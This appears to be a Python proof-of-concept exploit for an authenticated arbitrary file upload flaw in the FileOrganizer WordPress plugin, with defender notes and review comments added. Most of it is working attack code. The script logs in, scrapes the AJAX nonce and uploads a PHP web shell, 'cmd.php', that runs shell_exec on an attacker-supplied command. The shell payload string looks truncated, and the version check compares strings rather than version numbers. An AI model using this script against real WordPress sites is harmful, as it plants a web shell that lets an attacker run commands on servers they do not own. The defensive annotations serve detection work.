"""Proof-of-concept script for "FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload".

What the script does, as visible below:
  1. fingerprints the plugin version from its public readme.txt,
  2. logs in to wp-login.php with the supplied credentials,
  3. scrapes the plugin's AJAX nonce from the plugin admin page,
  4. sends a multipart POST to admin-ajax.php with
     action=fileorganizer_file_folder_manager and cmd=upload.

Defender notes (derived from the requests this script makes):
  * The upload is an authenticated call; the request pattern to watch for is a
    low-privilege (Subscriber) session POSTing to /wp-admin/admin-ajax.php with
    action=fileorganizer_file_folder_manager and cmd=upload, followed by a new
    .php file appearing under wp-content.
  * Unauthenticated GETs of /wp-content/plugins/fileorganizer/readme.txt are the
    fingerprinting step and show up before the login attempt.
  * Mitigation is keeping the plugin above the affected range named in the
    description and limiting who can hold accounts on the site.

NOTE(review): the page this was taken from had the source collapsed onto a few
lines; the code tokens below are reproduced as found, with line structure
restored and comments added. Nothing about the requests or payload was changed.
"""

import requests
import re
import argparse
from bs4 import BeautifulSoup

# Silence the InsecureRequestWarning that the next line's verify=False would
# otherwise print on every request.
requests.packages.urllib3.disable_warnings()
session = requests.Session()
# TLS certificate validation is disabled for every request made through
# this session (self-signed / lab targets); this also removes any protection
# against an on-path interceptor of the credentials sent below.
session.verify = False

# ASCII-art banner; the whitespace here was mangled by extraction and is
# reproduced as found on the page.
banner = """ '######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::'#######:::'#######::'########: '##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##.. ##:'##.... ##:'##.... ##: ##.....:: ##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##:::::::::::..:: ##::: ##:::: ##: ##:::: ##: ##::::::: ##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######:::: ##::::: ########:: #######:: #######:: ##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........::: ##::::::...... ##:'##.... ##:...... ##: ##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##::::::::::::: ##:::::'##:::: ##: ##:::: ##:'##::: ##: . ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##::::::::::::: ##:::::. #######::. #######::. 
######:: :......::::::...:::::........::::::::::By Nxploit Khaled_alenazi....:::::::::::..::::::::::::::..:::::::.......::::.......::::......::: """

# Command-line interface. All four options are plain strings; --cmd is
# interpolated verbatim into the uploaded file body further down.
parser = argparse.ArgumentParser(description="FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi")
parser.add_argument("--url", required=True, help="Target WordPress site URL")
parser.add_argument("--username", required=True, help="WordPress Username")
parser.add_argument("--password", required=True, help="WordPress Password")
parser.add_argument("--cmd", default="ls -la /", help="Command to execute in uploaded file")
args = parser.parse_args()
print(banner)


def check_version(url):
    """Fingerprint the installed plugin version from its public readme.txt.

    Args:
        url: Site base URL, used as-is as the prefix of the readme path
            (no trailing-slash normalisation is done).

    Returns:
        True when the readme is served with HTTP 200, contains a
        ``Stable tag: X.Y.Z`` line and that tag compares <= "1.0.9";
        False in every other case (non-200, no match, or a "newer" tag).

    Notes:
        * ``headers`` is a module-level global that is assigned *after* this
          function is defined but before it is first called, so the lookup
          resolves at call time.
        * NOTE(review): ``version <= "1.0.9"`` is a lexicographic string
          comparison, not a semantic-version comparison, so the result for
          tags whose components are not all single digits is not what the
          message implies. Left as-is.
    """
    version_url = f"{url}/wp-content/plugins/fileorganizer/readme.txt"
    # verify=False here is redundant with session.verify = False above.
    response = session.get(version_url, headers=headers, verify=False)
    if response.status_code == 200:
        version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', response.text)
        if version_match:
            version = version_match.group(1)
            if version <= "1.0.9":
                print(f"[+] Vulnerable version detected: {version}")
                return True
    print("[-] Target is not vulnerable or unreachable.")
    return False


# Browser-like User-Agent sent with every request; it is the only header the
# script sets, so UA alone is not a reliable detection signal.
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}

if not check_version(args.url):
    exit()

# Step 2: standard wp-login.php form login. Success is judged purely by the
# presence of a "wordpress_logged_in*" cookie in the session jar.
login_url = f"{args.url}/wp-login.php"
login_data = {
    "log": args.username,
    "pwd": args.password,
    "rememberme": "forever",
    "wp-submit": "Log In"
}
response = session.post(login_url, data=login_data, headers=headers)
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
    print("[+] Logged in successfully!")
else:
    print("[-] Failed to log in. Check your credentials.")
    exit()

# Step 3: load the plugin's admin page and pull the AJAX nonce out of the
# inline script with a regex. The nonce is what the upload handler checks,
# so a session that can render this page can also call the handler.
admin_url = f"{args.url}/wp-admin/admin.php?page=fileorganizer"
response = session.get(admin_url, headers=headers)
# NOTE(review): `soup` is built but never read; the nonce is taken from the
# raw response text below.
soup = BeautifulSoup(response.text, 'html.parser')
nonce_match = re.search(r'var fileorganizer_ajax_nonce = "(.*?)";', response.text)
if nonce_match:
    nonce = nonce_match.group(1)
    print(f"[+] Extracted nonce: {nonce}")
else:
    print("[-] Failed to extract nonce.")
    exit()

# Step 4: multipart upload through admin-ajax.php. The file name, MIME type
# and form fields below are the concrete request shape a WAF rule or access
# log search can key on.
exploit_url = f"{args.url}/wp-admin/admin-ajax.php"
files = {
    # File body reproduced exactly as found on the page.
    "upload[]": ("cmd.php", f"' . shell_exec('{args.cmd}') . '';\n?>", "application/x-php")
}
data = {
    # reqid / target / mtime[] are fixed literals copied from a captured
    # request; `target` presumably selects the destination folder in the
    # file manager's own encoding — not decoded here, verify against the
    # plugin's JavaScript if it matters.
    "reqid": "1950b7157c315a",
    "cmd": "upload",
    "target": "l1_d3AtY29udGVudA",
    "action": "fileorganizer_file_folder_manager",
    "fileorganizer_nonce": nonce,
    "mtime[]": "1738507656"
}
response = session.post(exploit_url, files=files, data=data, headers=headers)
print("[+] Server Response:")
print(response.status_code, response.reason)
print(response.headers)
print(response.text)
# Success heuristic: the uploaded file name echoed in the JSON reply, whose
# `added[0].url` field is then printed. Any parsing problem (non-JSON body,
# missing keys) is caught broadly and reported rather than raised.
if "cmd.php" in response.text:
    try:
        json_response = response.json()
        file_url = json_response['added'][0]['url']
        print(f"[+] File uploaded successfully!")
        print(f"[+] Access file at: {file_url}")
    except Exception as e:
        print("[!] Error extracting file URL from response:", str(e))
else:
    print("[-] Upload failed!")